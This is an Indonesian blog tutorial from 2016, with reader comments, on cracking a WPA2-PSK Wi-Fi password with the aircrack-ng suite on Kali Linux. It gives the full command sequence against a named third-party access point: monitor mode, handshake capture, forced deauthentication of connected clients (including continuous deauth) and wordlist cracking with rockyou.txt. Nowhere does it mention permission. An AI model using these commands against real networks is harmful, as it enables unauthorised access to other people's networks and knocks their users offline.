Thursday 5 May 2016

Wi-Fu.. Hacking WIFI WPA2-PSK Dengan Aircrack-ng Di Kali v2




 Seperti biasa gan,,
langsung aja buka konsole...

~# airmon-ng start wlan0


Jika terjadi error saat menjalankan perintah di atas,,
coba ketik perintah berikut..

~# airmon-ng check kill


Kalo nggak ada masalah,,
kita lanjutin acaranya....

Finding the target :

~# airodump-ng wlan0mon


Disini gwe pake interface monitornya wlan1
Sesuaikan ajah dengan interface masing2....

 Cari target yang sesuai gan..
Yang kira2 ada client nya.....

Kalo udah dapet target nya,,
tutup dulu airodump-ng nya...

Disini gwe memilih target Wpa2 Psk...

Nama AP : Sarangmas

BSSID : 9C:97:26:36:6D:0B

Channel : 6



Okey..
Selanjutnya kita dapetin handsahake nya...

~# airodump-ng --bssid 9C:97:26:36:6D:0B --channel 6 wlan0mon -w contoh


-w contoh adalah nama file output hasil airodump-ng,,
yang mana di file inilah handshake akan di record...  


Dan kita biarkan terminal tetap terbuka untuk capturing paket handshake..



Handshake akan kita dapat jika terdapat client yang login..

Dan kita akan putuskan koneksi client dengan akses point,,
supaya si client tadi melakukan login ulang..

Dan jika itu terjadi,,
maka handshake akan kita dapatkan..

~# aireplay-ng --deauth 12 -a 9C:97:26:36:6D:0B wlan0mon


Serangan ini akan lebih efektif jika kita memasukkan MAC Address client secara spesifik..

~# aireplay-ng --deauth 12 -a 9C:97:26:36:6D:0B -c xx:xx:xx:xx:xx:xx wlan0mon



Ganti xx:xx:xx (merah) diatas,,
dengan mac address atau bssid dari salah satu client yang ada...


Tunggu sampai kita dapat handshakenya..

Jika dirasa agak susah dapat handshake,,
tambahkan nilai --deauth nya..

Misal --deauth 64..

Atau --deauth 0 (enol)..

Dan aireplay akan mengirim paket deauth secara terus menerus 
sampai kita hentikan dengan CTRL + C...


Jika sudah kita dapatkan handshakenya,,
tutup airodump-ng..



Dan sekarang saatnya kita cracking file captured nya..
untuk mendapatkan passwordnya..

~# aircrack-ng -b 9C:97:26:36:6D:0B contoh-01.cap -w wordlist.txt


Jika passwordnya ada di dalam file wordlist.txt tadi,,
maka password akan FOUNDED..

Jika tidak yaaa ganti pake wordlist yang laen..


Keberhasilan teknik ini,,
sangat bergantung pada wordlist untuk proses crackingnya...

Karena itu siapkan dulu wordlist yang ampuh gan..

Silahkan download dulu wordlistnya..

DI gugel banyak kok...

Atau di forum IBT..

Atau pake saja wordlist default (rockyou.txt) bawaan Kali..
Biasanya terletak di /usr /share/wordlists/rockyou.txt

Kalo masih dalam bentuk .gz , di extract dulu gan..

~# gzip -d /usr /share/wordlists/rockyou.txt.gz



Semoga bermanfaat...


Atau cobain koleksi gwe gan..
Ntar gwe tambahin lagi kalo ada waktu luang,, InsyaAllah...

4 comments:

  1. kebanyakan artikelnya mantap om .. lanjutkan

    ReplyDelete
    Replies
    1. makasih om supportnya..
      cuman gini2 aja bisanya...

      Delete
  2. mau tanya ni gan, kalau Error : Opening dictionary /home/document/list
    itu kanapa ya gan?

    ReplyDelete
    Replies
    1. itu lokasi wordlistnya salah gan..
      maaf baru balas.. :)

      Delete

Note: only a member of this blog may post a comment.